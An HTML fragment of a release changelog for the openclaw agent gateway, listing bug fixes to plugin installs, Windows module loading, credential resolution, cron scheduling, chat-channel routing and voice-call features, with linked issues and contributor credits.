<li>Plugins/install: hide bundled runtime-dependency npm child windows on Windows across Gateway startup, postinstall, and packaged staging paths so Telegram/Anthropic dependency repair no longer flashes shell windows. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331615103" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72315" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72315/hovercard" href="https://github.com/openclaw/openclaw/issues/72315">#72315</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/athuljayaram/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/athuljayaram">@athuljayaram</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshfeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshfeng">@joshfeng</a>.</li>
<li>Agents/Windows: normalize lazy agent runtime imports before Node ESM loading so Windows drive-letter <code>subagent-registry</code> runtime paths no longer fail every agent task with <code>ERR_UNSUPPORTED_ESM_URL_SCHEME</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333477433" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72636" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72636/hovercard" href="https://github.com/openclaw/openclaw/issues/72636">#72636</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334354906" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72716" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72716/hovercard" href="https://github.com/openclaw/openclaw/pull/72716">#72716</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Andyz-CData/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Andyz-CData">@Andyz-CData</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xialonglee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xialonglee">@xialonglee</a>.</li>
<li>Plugins/Windows: normalize lazy plugin service override imports before Node ESM loading so drive-letter browser-control module paths no longer fail with <code>ERR_UNSUPPORTED_ESM_URL_SCHEME</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332955345" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72573" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72573/hovercard" href="https://github.com/openclaw/openclaw/issues/72573">#72573</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333188067" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72599" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72599/hovercard" href="https://github.com/openclaw/openclaw/pull/72599">#72599</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333023955" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72582" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72582/hovercard" href="https://github.com/openclaw/openclaw/pull/72582">#72582</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/llzzww316/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/llzzww316">@llzzww316</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/feineryonah-byte/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/feineryonah-byte">@feineryonah-byte</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WuKongAI-CMU/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WuKongAI-CMU">@WuKongAI-CMU</a>.</li>
<li>Browser/plugins: load <code>playwright-core</code> through the browser runtime shim so packaged installs can run Playwright actions from staged plugin runtime deps after doctor/startup repair. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330902734" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72168" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72168/hovercard" href="https://github.com/openclaw/openclaw/issues/72168">#72168</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331230145" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72238" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72238/hovercard" href="https://github.com/openclaw/openclaw/pull/72238">#72238</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zdg1110/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zdg1110">@zdg1110</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yetval/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yetval">@yetval</a>.</li>
<li>Plugins/install: stage bundled plugin runtime dependencies before Gateway startup, drain update restarts, and materialize plugin-owned root chunks in external mirrors so staged deps resolve under native ESM. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330416924" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72058" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72058/hovercard" href="https://github.com/openclaw/openclaw/issues/72058">#72058</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330508233" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72084" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72084/hovercard" href="https://github.com/openclaw/openclaw/pull/72084">#72084</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amnesia106/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amnesia106">@amnesia106</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drvoss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drvoss">@drvoss</a>.</li>
<li>TTS/SecretRef: resolve <code>messages.tts.providers.*.apiKey</code> from the active runtime snapshot so SecretRef-backed MiniMax and other TTS provider keys work in runtime reply/audio paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289130983" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68690" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68690/hovercard" href="https://github.com/openclaw/openclaw/issues/68690">#68690</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Gateway/install: surface systemd user-bus recovery hints during Linux service activation and retry via the target user scope when <code>systemctl --user</code> reports no-medium bus failures, without letting stale <code>SUDO_USER</code> override <code>sudo -u</code> installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4040941886" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39673" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39673/hovercard" href="https://github.com/openclaw/openclaw/issues/39673">#39673</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067677546" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44417" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44417/hovercard" href="https://github.com/openclaw/openclaw/issues/44417">#44417</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4229610817" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63561" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63561/hovercard" href="https://github.com/openclaw/openclaw/issues/63561">#63561</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Arbor4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Arbor4">@Arbor4</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/myrsu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/myrsu">@myrsu</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mssteuer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mssteuer">@mssteuer</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/boyuaner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/boyuaner">@boyuaner</a>.</li>
<li>CLI/nodes: make unfiltered <code>openclaw nodes list</code> prefer the effective paired-node view used by <code>nodes status</code> while preserving pending rows, pairing-scope fallback, terminal-safe table rendering, and paired JSON metadata. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077580136" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46871" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46871/hovercard" href="https://github.com/openclaw/openclaw/issues/46871">#46871</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4252092457" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65772" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65772/hovercard" href="https://github.com/openclaw/openclaw/pull/65772">#65772</a> through the ProjectClownfish <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333343041" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72619" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72619/hovercard" href="https://github.com/openclaw/openclaw/pull/72619">#72619</a> repair. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/skainguyen1412/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/skainguyen1412">@skainguyen1412</a>.</li>
<li>CLI/startup: read generated startup metadata from the bundled <code>dist</code> layout before falling back to live help rendering, so root/browser help and channel-option bootstrap stay on the fast path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Feishu/Lark: stop treating broadcast-only <code>@all</code>/<code>@_all</code> messages as bot mentions while preserving direct bot mentions, including messages that also include <code>@all</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4033693984" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/37706" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/37706/hovercard" href="https://github.com/openclaw/openclaw/issues/37706">#37706</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JosepLee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JosepLee">@JosepLee</a>.</li>
<li>CLI/help: treat positional <code>help</code> invocations like <code>openclaw channels help</code> as help paths for startup gating, avoiding model/auth warmup while preserving positional arguments such as <code>openclaw docs help</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gumadeiras/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gumadeiras">@gumadeiras</a>.</li>
<li>Web search: route plugin-scoped web_search SecretRefs through the active runtime config snapshot so provider execution receives resolved credentials across app/runtime paths, including <code>plugins.entries.brave.config.webSearch.apiKey</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289130983" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68690" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68690/hovercard" href="https://github.com/openclaw/openclaw/issues/68690">#68690</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VACInc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VACInc">@VACInc</a>.</li>
<li>Voice Call: allow SecretRef-backed Twilio auth tokens and call-specific OpenAI/ElevenLabs TTS API keys through the plugin config surface. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289130983" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68690" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68690/hovercard" href="https://github.com/openclaw/openclaw/issues/68690">#68690</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Google Meet/Voice Call: clean stale chrome-node realtime bridges before rejoining, expose bridge inspection, tolerate transient node input pull failures, default Chrome command-pair audio to 24 kHz PCM16 while preserving legacy 8 kHz G.711 mu-law pairs, handle Gemini Live interruptions/VAD and function-response names correctly, route stateful <code>google_meet</code> tools through the gateway runtime, support <code>realtime.agentId</code>, and send non-blocking consult continuations before long tool-backed answers finish. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332050444" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72371" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72371/hovercard" href="https://github.com/openclaw/openclaw/issues/72371">#72371</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332743811" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72525" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72525/hovercard" href="https://github.com/openclaw/openclaw/issues/72525">#72525</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332742867" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72523" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72523/hovercard" href="https://github.com/openclaw/openclaw/issues/72523">#72523</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332383464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72440" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72440/hovercard" href="https://github.com/openclaw/openclaw/issues/72440">#72440</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332290261" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72425" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72425/hovercard" href="https://github.com/openclaw/openclaw/issues/72425">#72425</a>; (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332050745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72372" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72372/hovercard" href="https://github.com/openclaw/openclaw/pull/72372">#72372</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332743254" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72524" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72524/hovercard" href="https://github.com/openclaw/openclaw/pull/72524">#72524</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332097646" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72381" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72381/hovercard" href="https://github.com/openclaw/openclaw/pull/72381">#72381</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332388165" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72441" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72441/hovercard" href="https://github.com/openclaw/openclaw/pull/72441">#72441</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330987894" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72189" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72189/hovercard" href="https://github.com/openclaw/openclaw/pull/72189">#72189</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332290401" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72426" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72426/hovercard" href="https://github.com/openclaw/openclaw/pull/72426">#72426</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BsnizND/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BsnizND">@BsnizND</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VACInc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VACInc">@VACInc</a>.</li>
<li>Discord/media: keep incidental Markdown image badges in final replies as text unless a channel opts into Markdown-image media extraction, while preserving Telegram Markdown-image media replies and explicit <code>MEDIA:</code> attachments. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333512243" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72642" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72642/hovercard" href="https://github.com/openclaw/openclaw/issues/72642">#72642</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solavrc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solavrc">@solavrc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Bartok9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Bartok9">@Bartok9</a>.</li>
<li>Matrix/E2EE: stabilize recovery and broken-device QA flows while avoiding Matrix device-cleanup sync races that could leave shutdown-time crypto work running. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gumadeiras/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gumadeiras">@gumadeiras</a>.</li>
<li>Cron: apply <code>cron.maxConcurrentRuns</code> to the nested isolated-agent lane, start isolated execution timeouts only after the runner enters that lane, keep legacy flat <code>jobs.json</code> rows loadable, invalidate stale pending runtime slots after schedule edits, and preserve due slots for formatting-only rewrites. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334195587" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72707" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72707/hovercard" href="https://github.com/openclaw/openclaw/issues/72707">#72707</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3998171451" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/27996" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/27996/hovercard" href="https://github.com/openclaw/openclaw/issues/27996">#27996</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328262576" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71607" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71607/hovercard" href="https://github.com/openclaw/openclaw/issues/71607">#71607</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4049490726" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41783" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41783/hovercard" href="https://github.com/openclaw/openclaw/issues/41783">#41783</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328629024" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71651" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71651/hovercard" href="https://github.com/openclaw/openclaw/pull/71651">#71651</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kagura-agent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kagura-agent">@kagura-agent</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xialonglee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xialonglee">@xialonglee</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fagnersouza666/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fagnersouza666">@fagnersouza666</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ayanesakura/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ayanesakura">@ayanesakura</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Hurray0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Hurray0">@Hurray0</a>.</li>
<li>Cron/delivery: classify isolated successes, quiet <code>NO_REPLY</code> turns, model/provider failures, execution denials, <code>--no-deliver</code> traces, skipped-job alerts, and verified delivery outcomes correctly so cron history, retries, and failure counters reflect what actually happened. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334620088" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72732" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72732/hovercard" href="https://github.com/openclaw/openclaw/issues/72732">#72732</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4099027844" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50170" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50170/hovercard" href="https://github.com/openclaw/openclaw/issues/50170">#50170</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4061722670" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43604" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43604/hovercard" href="https://github.com/openclaw/openclaw/issues/43604">#43604</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4287182300" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68452" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68452/hovercard" href="https://github.com/openclaw/openclaw/issues/68452">#68452</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204696109" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60846" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60846/hovercard" href="https://github.com/openclaw/openclaw/issues/60846">#60846</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331088054" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72210" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72210/hovercard" href="https://github.com/openclaw/openclaw/issues/72210">#72210</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4268858101" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67172" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67172/hovercard" href="https://github.com/openclaw/openclaw/issues/67172">#67172</a>; follow-up to <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4132019195" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54188" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54188/hovercard" href="https://github.com/openclaw/openclaw/issues/54188">#54188</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4061845058" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43631" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43631/hovercard" href="https://github.com/openclaw/openclaw/pull/43631">#43631</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4287182726" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68453" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68453/hovercard" href="https://github.com/openclaw/openclaw/pull/68453">#68453</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331130608" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72219" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72219/hovercard" href="https://github.com/openclaw/openclaw/pull/72219">#72219</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4269089318" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67186" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67186/hovercard" href="https://github.com/openclaw/openclaw/pull/67186">#67186</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zNatix/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zNatix">@zNatix</a>, @pixeldyn, @ChickenEggRoll, @SPFAdvisors, @anyech, @slideshow-dingo, @hatemclawbot-collab, @xydigit-sj, @oc-gh-dr, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1yihui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1yihui">@1yihui</a>.</li>
<li>Cron/routing: preserve direct Telegram thread/account IDs, explicit Discord <code>user:</code>/<code>channel:</code> delivery targets, and <code>session:&lt;id&gt;</code> failure-destination routing so reminders, cron announcements, and failure alerts keep the intended recipient kind across direct and group chats. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4066185841" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44270" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44270/hovercard" href="https://github.com/openclaw/openclaw/issues/44270">#44270</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221312754" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62777" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62777/hovercard" href="https://github.com/openclaw/openclaw/issues/62777">#62777</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4066608008" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44325" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44325/hovercard" href="https://github.com/openclaw/openclaw/pull/44325">#44325</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4066877751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44351" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44351/hovercard" href="https://github.com/openclaw/openclaw/pull/44351">#44351</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067595953" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44412" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44412/hovercard" href="https://github.com/openclaw/openclaw/pull/44412">#44412</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333658933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72657" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72657/hovercard" href="https://github.com/openclaw/openclaw/pull/72657">#72657</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4287884114" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68535" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68535/hovercard" href="https://github.com/openclaw/openclaw/pull/68535">#68535</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221461201" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62798" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62798/hovercard" href="https://github.com/openclaw/openclaw/pull/62798">#62798</a>. Thanks @RunMintOn, @arkyu2077, @0xsline, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>, @slideshow-dingo, @likewen-tech, and @neeravmakwana.</li>
<li>Subagents: keep the delegated task only in the subagent system prompt and send a short initial kickoff message, avoiding duplicate task tokens while preserving multiline task formatting. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330266987" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72019" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72019/hovercard" href="https://github.com/openclaw/openclaw/issues/72019">#72019</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330403858" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72053" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72053/hovercard" href="https://github.com/openclaw/openclaw/pull/72053">#72053</a>. Thanks @Wizongod and @ly85206559.</li>
